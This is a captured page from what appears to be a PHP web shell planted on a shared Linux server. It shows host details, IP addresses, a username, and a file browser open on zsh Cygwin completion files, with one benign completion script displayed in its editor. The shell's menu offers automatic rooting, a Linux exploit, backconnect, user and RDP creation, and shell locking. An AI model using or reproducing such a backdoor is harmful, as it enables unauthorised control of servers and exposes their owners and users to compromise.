Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
Cygwin /
[ HOME SHELL ]
Name
Size
Permission
Action
_cygcheck
2
KB
-rw-r--r--
_cygpath
2.55
KB
-rw-r--r--
_cygrunsrv
2.71
KB
-rw-r--r--
_cygserver
1.5
KB
-rw-r--r--
_cygstart
2.13
KB
-rw-r--r--
_dumper
377
B
-rw-r--r--
_getclip
532
B
-rw-r--r--
_mkshortcut
1.24
KB
-rw-r--r--
_mkzsh
371
B
-rw-r--r--
_pscp
716
B
-rw-r--r--
_putclip
538
B
-rw-r--r--
_readshortcut
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _cygserver
#compdef cygserver cygserver.exe # cygwin 1.5.25 _arguments -s -S \ '(--config-file -f)'{-f,--config-file}'[use specified file as config file (default /etc/cygserver.conf)]:config file:_files -g "*.conf(-.)"' \ '(--cleanup-threads -c)'{-c,--cleanup-threads}'[number of cleanup threads to use (default 2)]:number of threads:' \ '(--process-cache -p)'{-p,--process-cache}'[size of process cache]:cache size:' \ '(--request-threads -r)'{-r,--request-threads}'[number of request threads to use (default 10)]:number of threads:' \ '(--debug -d)'{-d,--debug}'[log debug messages to stderr]' \ '(--stderr -e --no-stderr -E)'{-e,--stderr}'[log to stderr (default if stderr is a tty)]' \ '(--stderr -e --no-stderr -E)'{-E,--no-stderr}"[don't log to stderr (see -y, -Y options)]" \ '(--log-level -l)'{-l,--log-level}'[verbosity of logging (1..7) (default 6)]:verbosity level:({1..7})' \ '(--syslog -y --no-syslog -Y)'{-y,--syslog}'[log to syslog (default if stderr is no tty)]' \ '(--syslog -y --no-syslog -Y)'{-Y,--no-syslog}"[don't log to syslog (see -e, -E options)]" \ '(--no-sharedmem -m)'{-m,--no-sharedmem}"[don't start XSI Shared Memory support]" \ '(--no-msgqueues -q)'{-q,--no-msgqueues}"[don't start XSI Message Queue support]" \ '(--no-semaphores -s)'{-s,--no-semaphores}"[don't start XSI Semaphore support]" \ '(--shutdown -S)'{-S,--shutdown}'[shutdown the daemon]' \ '(--help -h)'{-h,--help}'[output usage information and exit]' \ '(--version -v)'{-v,--version}'[output version information and exit]'
Close